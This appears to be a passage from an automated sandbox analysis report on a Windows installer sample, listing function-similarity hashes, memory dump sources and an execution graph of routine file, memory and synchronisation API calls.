                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: 3333
                                    • API String ID: 3732870572-2924271548
                                    • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                    • Instruction ID: f631717390c0a15f6601f6e62b524a40eac0f5b0e83dd8944a9884acc02ca540
                                    • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                    • Instruction Fuzzy Hash: E62158B1900748AED7308FA98980B6BBBFDEB54B54F10891FA146D7B40D770E9448B65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: dU&l$hU&l
                                    • API String ID: 269201875-241561095
                                    • Opcode ID: f66853145b4581f96f089f0c2d514841fe23822ecabe7f6351488bebe6ac645b
                                    • Instruction ID: f713e14429265d763a591727582589889430413bd4afb8ef3442d0e0401a4752
                                    • Opcode Fuzzy Hash: f66853145b4581f96f089f0c2d514841fe23822ecabe7f6351488bebe6ac645b
                                    • Instruction Fuzzy Hash: 3F1193712043019BE7208F6AD495B82B7E4EB15358F30442FE499D7F80EB71E9868BB0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$LuJ
                                    • API String ID: 3519838083-205571748
                                    • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                    • Instruction ID: 6779f2cb157e26dc4f17bbf9527aa2e98c58c6b3c6f8de7c1c1ae427de066c20
                                    • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                    • Instruction Fuzzy Hash: F50184B1E01349DADB14DFE988906AEF7B4FF65304F81842EE569E3A40C3746905CB59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$xMJ
                                    • API String ID: 3519838083-951924499
                                    • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                    • Instruction ID: 98a18e1743387d2b246b10ba32469548beb916c01d937d6320e3bf9099b0497b
                                    • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                    • Instruction Fuzzy Hash: CF117C75A00309DBCB00DFD9C4A059EB7B4FF59348B50C42ED469E7700D3399A06CB95
                                    APIs
                                    • _free.LIBCMT ref: 6C17DD49
                                    • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C17A63A,?,00000004,?,4B42FCB6,?,?,6C16F78C,4B42FCB6,?), ref: 6C17DD85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: AllocHeap_free
                                    • String ID: 8Q
                                    • API String ID: 1080816511-4022487301
                                    • Opcode ID: 86c7428a64efb91e8972a1227cf3f6d56d9660bd3dc7ab9aebdf0103cafb9a1b
                                    • Instruction ID: 8a71dada1e258171a0a5fac8b5eba6551b6369f53488c88decb7c6cc5252b4d0
                                    • Opcode Fuzzy Hash: 86c7428a64efb91e8972a1227cf3f6d56d9660bd3dc7ab9aebdf0103cafb9a1b
                                    • Instruction Fuzzy Hash: 4DF0C23220120D6ADB312A67DD44B9A3B689F93BB8B224125E9249BED0DF24C401C5F0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prologctype
                                    • String ID: |zJ
                                    • API String ID: 3037903784-3782439380
                                    • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                    • Instruction ID: 2ac14493cb4196faffc69955922cdffe02d363b6fc64b278140def989b39499b
                                    • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                    • Instruction Fuzzy Hash: 26E06572616520DBE7158F49D8107EDF3B8FF54B15F52401F9416A7A41CBB5B806C781
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prologctype
                                    • String ID: <oJ
                                    • API String ID: 3037903784-2791053824
                                    • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                    • Instruction ID: f9494cb93bcc508036b18e8029d74f0d0752a36f64ff099fe2f386ec46cd4f9b
                                    • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                    • Instruction Fuzzy Hash: FAE06D32B155209FDB059F49D820BEEF7A8EF66B24F11011FE025A7B51CBB5A8108686
                                    APIs
                                    • AcquireSRWLockExclusive.KERNEL32(6C26466C,?,?,652EF5AA,6C0322D8,6C26430C), ref: 6C166AB9
                                    • ReleaseSRWLockExclusive.KERNEL32(6C26466C), ref: 6C166AF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireRelease
                                    • String ID: lF&l
                                    • API String ID: 17069307-2742667394
                                    • Opcode ID: 9cb45ed7e234b41914b910ab7dedd47f276245fbc7947b357a91af9e3f4f7fb4
                                    • Instruction ID: b0499250aa128eda1ed64a2b8d01a33906fe904d77c6a82df674cd066fdc57c0
                                    • Opcode Fuzzy Hash: 9cb45ed7e234b41914b910ab7dedd47f276245fbc7947b357a91af9e3f4f7fb4
                                    • Instruction Fuzzy Hash: CBF0A735240508DBC710DF1AD404A65B7B4FB47335F15822DE8A583FD0C7341852CA62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @ K$DJ$T)K$X/K
                                    • API String ID: 0-3815299647
                                    • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                    • Instruction ID: ff9711c287737129bac42ad3da2a91076e6cb7f088b2bec9e928b339d0c2bed7
                                    • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                    • Instruction Fuzzy Hash: 7891D0346053059BCB04DFA4C4A07EEB3F2AF5130CF148919C87A5BB85DBBAA94BCB51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D)K$H)K$P)K$T)K
                                    • API String ID: 0-2262112463
                                    • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                    • Instruction ID: c09d8e90e74499ab6410acbd19ffc8966bb1c425b9ce8750829c5703b1a0d383
                                    • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                    • Instruction Fuzzy Hash: 5D51E33090420A9FDF01CF94D950BEEB7F5EF1531CF10445AE82967A80DB79995ACB91

                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0.3%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:30
                                    execution_graph 73234 a2c2e6 73235 a2c52f 73234->73235 73238 a2544f SetConsoleCtrlHandler 73235->73238 73237 a2c53b 73238->73237 73239 a76ba3 VirtualFree 73240 a3bf67 73241 a3bf74 73240->73241 73242 a3bf85 73240->73242 73241->73242 73246 a3bf8c 73241->73246 73247 a3bf96 __EH_prolog 73246->73247 73263 a3d144 73247->73263 73251 a3bfd0 73270 9f1e40 free 73251->73270 73253 a3bfdb 73271 9f1e40 free 73253->73271 73255 a3bfe6 73272 a3c072 free ctype 73255->73272 73257 a3bff4 73273 a0aafa free VariantClear ctype 73257->73273 73259 a3c023 73274 a173d2 free VariantClear __EH_prolog ctype 73259->73274 73261 a3bf7f 73262 9f1e40 free 73261->73262 73262->73242 73266 a3d14e __EH_prolog 73263->73266 73275 a3d1b7 73266->73275 73268 a3bfc5 73269 9f1e40 free 73268->73269 73269->73251 73270->73253 73271->73255 73272->73257 73273->73259 73274->73261 73283 a3d23c 73275->73283 73277 a3d1ed 73290 9f1e40 free 73277->73290 73279 a3d209 73291 9f1e40 free 73279->73291 73281 a3d180 73282 a38e04 memset 73281->73282 73282->73268 73292 a3d2b8 73283->73292 73288 a3d25e 73309 9f1e40 free 73288->73309 73289 a3d275 73289->73277 73290->73279 73291->73281 73311 9f1e40 free 73292->73311 73294 a3d2c8 73312 9f1e40 free 73294->73312 73296 a3d2dc 73313 9f1e40 free 73296->73313 73298 a3d2e7 73314 9f1e40 free 73298->73314 73300 a3d2f2 73315 9f1e40 free 73300->73315 73302 a3d2fd 73316 9f1e40 free 73302->73316 73304 a3d308 73317 9f1e40 free 73304->73317 73306 a3d313 73307 a3d246 73306->73307 73318 9f1e40 free 73306->73318 73307->73288 73310 9f1e40 free 73307->73310 73309->73289 73310->73288 73311->73294 73312->73296 73313->73298 73314->73300 73315->73302 73316->73304 73317->73306 73318->73307 73319 9fb5d9 73320 9fb5e6 73319->73320 73324 9fb5f7 73319->73324 73320->73324 73325 9fb5fe 73320->73325 73326 9fb608 __EH_prolog 73325->73326 73332 a76a40 VirtualFree 73326->73332 73328 9fb63d 73333 9f764c 73328->73333 73331 9f1e40 free 73331->73324 73332->73328 73334 9f7656 CloseHandle 73333->73334 73335 9f7661 73333->73335 73334->73335 73335->73331 73336 a87da0 WaitForSingleObject 73337 a87dbb GetLastError 73336->73337 73338 a87dc1 73336->73338 73337->73338 73339 a87dce CloseHandle 73338->73339 73341 a87ddf 73338->73341 73340 a87dd9 GetLastError 73339->73340 73339->73341 73340->73341 73342 a01368 73345 a0136d 73342->73345 73344 a0138c 73345->73344 73348 a87d80 WaitForSingleObject 73345->73348 73351 a2f745 73345->73351 73355 a87ea0 SetEvent GetLastError 73345->73355 73349 a87d8e GetLastError 73348->73349 73350 a87d98 73348->73350 73349->73350 73350->73345 73352 a2f74f __EH_prolog 73351->73352 73356 a2f784 73352->73356 73354 a2f765 73354->73345 73355->73345 73357 a2f78e __EH_prolog 73356->73357 73365 a012d4 73357->73365 73360 a012d4 4 API calls 73361 a2f7d4 73360->73361 73362 a2f871 73361->73362 73373 9fc4d6 73361->73373 73379 a76b23 VirtualAlloc 73361->73379 73362->73354 73366 a012e7 73365->73366 73367 a01327 73365->73367 73368 a01304 73366->73368 73369 a012ef _CxxThrowException 73366->73369 73367->73360 73380 9f1e40 free 73368->73380 73369->73368 73371 a0130b 73381 9f1e0c 73371->73381 73377 9fc4e9 73373->73377 73374 9fc6f3 73374->73362 73377->73374 73378 9fc695 memmove 73377->73378 73386 a0111c 73377->73386 73391 a011b4 73377->73391 73378->73377 73379->73362 73380->73371 73382 9f1e1c malloc 73381->73382 73383 9f1e15 73381->73383 73384 9f1e3e 73382->73384 73385 9f1e2a _CxxThrowException 73382->73385 73383->73382 73384->73367 73385->73384 73387 a01130 73386->73387 73388 a0115f 73387->73388 73396 9fb668 73387->73396 73415 9fd331 73387->73415 73388->73377 73392 a011c1 73391->73392 73393 a011eb 73392->73393 73436 a3ae7c 73392->73436 73441 a3af27 73392->73441 73393->73377 73398 9fb675 73396->73398 73401 9fb81b 73398->73401 73404 9fb7e7 73398->73404 73405 9fb6aa 73398->73405 73406 9fb811 73398->73406 73408 9fb7ad 73398->73408 73413 9fb864 73398->73413 73423 9f7731 73398->73423 73432 9f7b4f ReadFile 73398->73432 73400 9fb8aa GetLastError 73400->73405 73403 9fb839 memcpy 73401->73403 73401->73405 73403->73405 73407 9f7731 5 API calls 73404->73407 73404->73413 73405->73387 73433 9fb8ec GetLastError 73406->73433 73410 9fb80d 73407->73410 73408->73398 73414 9fb8c7 73408->73414 73431 a76a20 VirtualAlloc 73408->73431 73410->73406 73410->73413 73419 9f7b7c 73413->73419 73414->73405 73416 9fd355 73415->73416 73417 9fd374 73416->73417 73418 9fb668 10 API calls 73416->73418 73417->73387 73418->73417 73420 9f7b89 73419->73420 73434 9f7b4f ReadFile 73420->73434 73422 9f7b9a 73422->73400 73422->73405 73424 9f775c SetFilePointer 73423->73424 73425 9f7740 73423->73425 73426 9f7780 GetLastError 73424->73426 73429 9f77a1 73424->73429 73425->73424 73427 9f778c 73426->73427 73426->73429 73435 9f76d6 SetFilePointer GetLastError 73427->73435 73429->73398 73430 9f7796 SetLastError 73430->73429 73431->73408 73432->73398 73433->73405 73434->73422 73435->73430 73437 a3ae86 73436->73437 73448 a07140 73437->73448 73452 a07190 73437->73452 73438 a3aebb 73438->73392 73442 a3af36 73441->73442 73444 a3b010 73442->73444 73446 a3aeeb 107 API calls 73442->73446 73553 9fbd0c 73442->73553 73558 a3ad3a 73442->73558 73562 a3aebf 107 API calls 73442->73562 73444->73392 73446->73442 73449 a0718d 73448->73449 73450 a0714b 73448->73450 73449->73438 73450->73449 73465 a04dff 7 API calls 2 library calls 73450->73465 73453 a0719a __EH_prolog 73452->73453 73454 a071b0 73453->73454 73456 a071dd 73453->73456 73492 a04d78 73454->73492 73466 a06fc5 73456->73466 73458 a071b7 73458->73438 73459 a072b4 73460 a04d78 VariantClear 73459->73460 73461 a072c0 73459->73461 73460->73461 73461->73458 73462 a07140 7 API calls 73461->73462 73462->73458 73463 a07236 73463->73458 73463->73459 73464 a072a3 SetFileSecurityW 73463->73464 73464->73459 73465->73449 73467 a06fcf __EH_prolog 73466->73467 73495 a044a6 73467->73495 73469 a0706a 73498 a068ac 73469->73498 73473 a0709e 73522 9f1e40 free 73473->73522 73475 a07029 73475->73469 73517 a04dff 7 API calls 2 library calls 73475->73517 73476 a07051 73476->73469 73480 a011b4 107 API calls 73476->73480 73479 a070c0 73518 9f6096 15 API calls 2 library calls 73479->73518 73480->73469 73481 a0712e 73481->73463 73483 a070d1 73484 a070e2 73483->73484 73519 a04dff 7 API calls 2 library calls 73483->73519 73488 a070e6 73484->73488 73520 a06b5e 69 API calls 2 library calls 73484->73520 73487 a070fd 73487->73488 73489 a07103 73487->73489 73488->73473 73521 9f1e40 free 73489->73521 73491 a0710b 73491->73481 73542 a19262 73492->73542 73523 9f2e04 73495->73523 73499 a068b6 __EH_prolog 73498->73499 73500 a06921 73499->73500 73513 a068c5 73499->73513 73527 9f7d4b 73499->73527 73501 a06962 73500->73501 73507 a06998 73500->73507 73533 a06a17 6 API calls 2 library calls 73500->73533 73501->73507 73534 9f2dcd malloc _CxxThrowException 73501->73534 73506 a069e1 73537 9fbcf8 CloseHandle 73506->73537 73507->73506 73526 9f7c3b SetFileTime 73507->73526 73509 a0697a 73535 a06b09 13 API calls __EH_prolog 73509->73535 73513->73473 73513->73479 73514 a0698c 73536 9f1e40 free 73514->73536 73516 a06e71 12 API calls 2 library calls 73516->73475 73517->73476 73518->73483 73519->73484 73520->73487 73521->73491 73522->73481 73524 9f1e0c ctype 2 API calls 73523->73524 73525 9f2e11 73524->73525 73525->73469 73525->73475 73525->73516 73526->73506 73538 9f77c8 73527->73538 73530 9f7d76 73530->73500 73532 a04dff 7 API calls 2 library calls 73530->73532 73532->73500 73533->73501 73534->73509 73535->73514 73536->73507 73537->73513 73539 9f7731 SetFilePointer GetLastError SetFilePointer GetLastError SetLastError 73538->73539 73540 9f77db 73539->73540 73540->73530 73541 9f7d3c SetEndOfFile 73540->73541 73541->73530 73543 a1926c __EH_prolog 73542->73543 73544 a192fc 73543->73544 73548 a192a4 73543->73548 73546 9f965d VariantClear 73544->73546 73547 a04d91 73546->73547 73547->73458 73549 9f965d 73548->73549 73550 9f9685 73549->73550 73552 9f9665 73549->73552 73550->73547 73551 9f967e VariantClear 73551->73550 73552->73550 73552->73551 73563 9f7ca2 73553->73563 73556 9fbd3d 73556->73442 73559 a3ad44 __EH_prolog 73558->73559 73571 a06305 73559->73571 73560 a3adbf 73560->73442 73562->73442 73565 9f7caf 73563->73565 73566 9f7cdb 73565->73566 73568 9f7c68 73565->73568 73566->73556 73567 9fb8ec GetLastError 73566->73567 73567->73556 73569 9f7c79 WriteFile 73568->73569 73570 9f7c76 73568->73570 73569->73565 73570->73569 73572 a0630f __EH_prolog 73571->73572 73608 a062b9 73572->73608 73574 a06427 73578 9f965d VariantClear 73574->73578 73576 a0644a 73577 9f965d VariantClear 73576->73577 73579 a0646b 73577->73579 73602 a06445 73578->73602 73612 a05126 73579->73612 73584 a04d78 VariantClear 73585 a06499 73584->73585 73590 a064ca 73585->73590 73585->73602 73768 a05110 9 API calls 73585->73768 73587 a065de 73588 a065e7 73587->73588 73589 a0669e 73587->73589 73592 a065f6 73588->73592 73595 9f1e0c ctype 2 API calls 73588->73595 73596 a06754 73589->73596 73597 a066b8 73589->73597 73589->73602 73591 a064da 73590->73591 73590->73602 73769 9f42e3 CharUpperW 73590->73769 73591->73587 73591->73602 73770 a0789c free memmove ctype 73591->73770 73771 a136ea 73592->73771 73595->73592 73658 a05bea 73596->73658 73600 9f1e0c ctype 2 API calls 73597->73600 73598 a0666b 73784 9f1e40 free 73598->73784 73600->73602 73602->73560 73603 a0665c 73783 9f31e5 malloc _CxxThrowException free _CxxThrowException 73603->73783 73609 a062c9 73608->73609 73785 a18fa4 73609->73785 73613 a05130 __EH_prolog 73612->73613 73614 a051b4 73613->73614 73620 a0518e 73613->73620 73845 9f3097 malloc _CxxThrowException free SysStringLen ctype 73613->73845 73616 9f965d VariantClear 73614->73616 73614->73620 73619 a051bc 73616->73619 73617 9f965d VariantClear 73618 a0527f 73617->73618 73618->73602 73654 a18b05 73618->73654 73619->73620 73621 a05206 73619->73621 73622 a05289 73619->73622 73620->73617 73846 9f3097 malloc _CxxThrowException free SysStringLen ctype 73621->73846 73622->73620 73624 a05221 73622->73624 73625 9f965d VariantClear 73624->73625 73626 a0522d 73625->73626 73626->73618 73627 a05351 73626->73627 73847 a05459 malloc _CxxThrowException __EH_prolog 73626->73847 73627->73618 73634 a053a1 73627->73634 73852 9f35e7 memmove 73627->73852 73629 a052ba 73848 9f8011 5 API calls ctype 73629->73848 73632 a052cf 73645 a052fd 73632->73645 73849 9f823d 10 API calls 2 library calls 73632->73849 73634->73618 73853 9f43b7 5 API calls 2 library calls 73634->73853 73637 a052e5 73638 9f2fec 3 API calls 73637->73638 73640 a052f5 73638->73640 73639 a0540e 73855 a0789c free memmove ctype 73639->73855 73850 9f1e40 free 73640->73850 73644 a053df 73644->73639 73646 a0541c 73644->73646 73854 9f42e3 CharUpperW 73644->73854 73851 a054a0 free ctype 73645->73851 73647 a136ea 5 API calls 73646->73647 73648 a05427 73647->73648 73649 9f2fec 3 API calls 73648->73649 73650 a05433 73649->73650 73856 9f1e40 free 73650->73856 73652 a0543b 73857 a22db9 free ctype 73652->73857 73655 a18b2e 73654->73655 73656 9f965d VariantClear 73655->73656 73657 a0648a 73656->73657 73657->73584 73657->73602 73659 a05bf4 __EH_prolog 73658->73659 73858 a054c0 73659->73858 73662 a18b05 VariantClear 73663 a05c34 73662->73663 73718 a05e17 73663->73718 73873 a05630 73663->73873 73666 a136ea 5 API calls 73667 a05c51 73666->73667 73668 a05c60 73667->73668 73976 a057c1 53 API calls 2 library calls 73667->73976 73894 9f2f1c 73668->73894 73671 a05c6c 73674 a05caa 73671->73674 73977 a06217 4 API calls 2 library calls 73671->73977 73673 a05c91 73675 9f2fec 3 API calls 73673->73675 73681 9f2e04 2 API calls 73674->73681 73736 a05d49 73674->73736 73676 a05c9e 73675->73676 73978 9f1e40 free 73676->73978 73677 a05d91 73687 a05da6 73677->73687 73897 a058be 73677->73897 73678 a05d55 73680 9f2fec 3 API calls 73678->73680 73682 a05d66 73680->73682 73684 a05cd2 73681->73684 73685 a05d73 73682->73685 73984 9f5b2d 11 API calls 2 library calls 73682->73984 73979 9f1e40 free 73684->73979 73685->73687 73690 a05d7b 73685->73690 73686 9f2fec 3 API calls 73689 a05dd1 73686->73689 73687->73686 73767 a05d8c 73687->73767 73693 a05e41 73689->73693 73694 a05de7 73689->73694 73689->73767 73695 a07140 7 API calls 73690->73695 73690->73767 73692 a05cf5 73701 9f2fec 3 API calls 73692->73701 73692->73736 73697 a05eb0 73693->73697 73988 a04115 VariantClear _CxxThrowException __EH_prolog 73693->73988 73985 a06b5e 69 API calls 2 library calls 73694->73985 73695->73767 73700 9f1e0c ctype 2 API calls 73697->73700 73699 a061fa 74006 9f1e40 free 73699->74006 73704 a05d0c 73701->73704 73702 a05e01 73980 9f1089 malloc _CxxThrowException free _CxxThrowException 73704->73980 73711 a05d16 73718->73602 73720 a05e6e 73720->73697 73720->73767 73736->73677 73736->73678 74005 9f1e40 free 73767->74005 73768->73590 73769->73590 73770->73587 73772 a136f4 __EH_prolog 73771->73772 73773 9f2e04 2 API calls 73772->73773 73774 a1370a 73773->73774 73775 a13736 73774->73775 74165 9f1089 malloc _CxxThrowException free _CxxThrowException 73774->74165 74166 9f31e5 malloc _CxxThrowException free _CxxThrowException 73774->74166 73776 9f2f1c 2 API calls 73775->73776 73779 a13742 73776->73779 74164 9f1e40 free 73779->74164 73781 a06633 73781->73598 73781->73603 73782 9f1089 malloc _CxxThrowException free _CxxThrowException 73781->73782 73782->73603 73783->73598 73784->73602 73786 a18fae __EH_prolog 73785->73786 73819 a17ebb 73786->73819 73792 a19020 73801 a06302 73792->73801 73827 9f2fec 73792->73827 73796 a191b0 73842 a18b9c 10 API calls 2 library calls 73796->73842 73797 a19244 73844 9f43b7 5 API calls 2 library calls 73797->73844 73800 a19144 73803 a1917b 73800->73803 73836 9f2f88 73800->73836 73801->73574 73801->73576 73801->73602 73803->73796 73803->73797 73804 a19100 73807 9f965d VariantClear 73804->73807 73805 a190d6 73805->73804 73809 a190e7 73805->73809 73835 a18f2e 9 API calls 73805->73835 73806 a1904d 73806->73800 73806->73801 73806->73804 73806->73805 73834 9f3097 malloc _CxxThrowException free SysStringLen ctype 73806->73834 73807->73801 73813 9f965d VariantClear 73809->73813 73810 a191c0 73810->73801 73812 9f2f88 3 API calls 73810->73812 73817 a191ff 73812->73817 73813->73800 73814 a19112 73814->73804 73815 a18b64 VariantClear 73814->73815 73816 a19123 73815->73816 73816->73804 73816->73809 73817->73801 73843 9f50ff free ctype 73817->73843 73820 a17ee4 73819->73820 73822 a17ec6 73819->73822 73823 a18b64 73820->73823 73821 9f1e40 free ctype 73821->73822 73822->73820 73822->73821 73824 a18b05 VariantClear 73823->73824 73825 a18b6f 73824->73825 73825->73801 73826 a18f2e 9 API calls 73825->73826 73826->73792 73828 9f2ffc 73827->73828 73832 9f2ff8 73827->73832 73829 9f1e0c ctype malloc _CxxThrowException 73828->73829 73828->73832 73830 9f3010 73829->73830 73831 9f1e40 ctype free 73830->73831 73831->73832 73832->73806 73833 a18b80 VariantClear 73832->73833 73833->73806 73834->73805 73835->73814 73837 9f2f9a 73836->73837 73837->73837 73838 9f2fbe 73837->73838 73839 9f1e0c ctype malloc _CxxThrowException 73837->73839 73838->73803 73840 9f2fb4 73839->73840 73841 9f1e40 ctype free 73840->73841 73841->73838 73842->73810 73843->73801 73844->73801 73845->73614 73846->73624 73847->73629 73848->73632 73849->73637 73850->73645 73851->73627 73852->73627 73853->73644 73854->73644 73855->73646 73856->73652 73857->73618 73859 a054ca __EH_prolog 73858->73859 73860 9f965d VariantClear 73859->73860 73863 a05507 73859->73863 73865 a05528 73860->73865 73861 9f965d VariantClear 73862 a05567 73861->73862 73862->73662 73862->73718 73863->73861 73864 a05572 73866 9f965d VariantClear 73864->73866 73865->73863 73865->73864 73867 a0558e 73866->73867 74007 a04cac VariantClear __EH_prolog 73867->74007 73869 a055a1 73869->73862 74008 a04cac VariantClear __EH_prolog 73869->74008 73871 a055b8 73871->73862 74009 a04cac VariantClear __EH_prolog 73871->74009 73875 a0563a __EH_prolog 73873->73875 73876 a05679 73875->73876 74010 a13558 10 API calls 2 library calls 73875->74010 73877 9f2f1c 2 API calls 73876->73877 73893 a0571a 73876->73893 73878 a05696 73877->73878 74011 a13333 malloc _CxxThrowException free 73878->74011 73880 a056a2 73881 a056ad 73880->73881 73883 a056c5 73880->73883 74012 a07853 5 API calls 2 library calls 73881->74012 73884 a056b4 73883->73884 74013 9f4adf wcscmp 73883->74013 73885 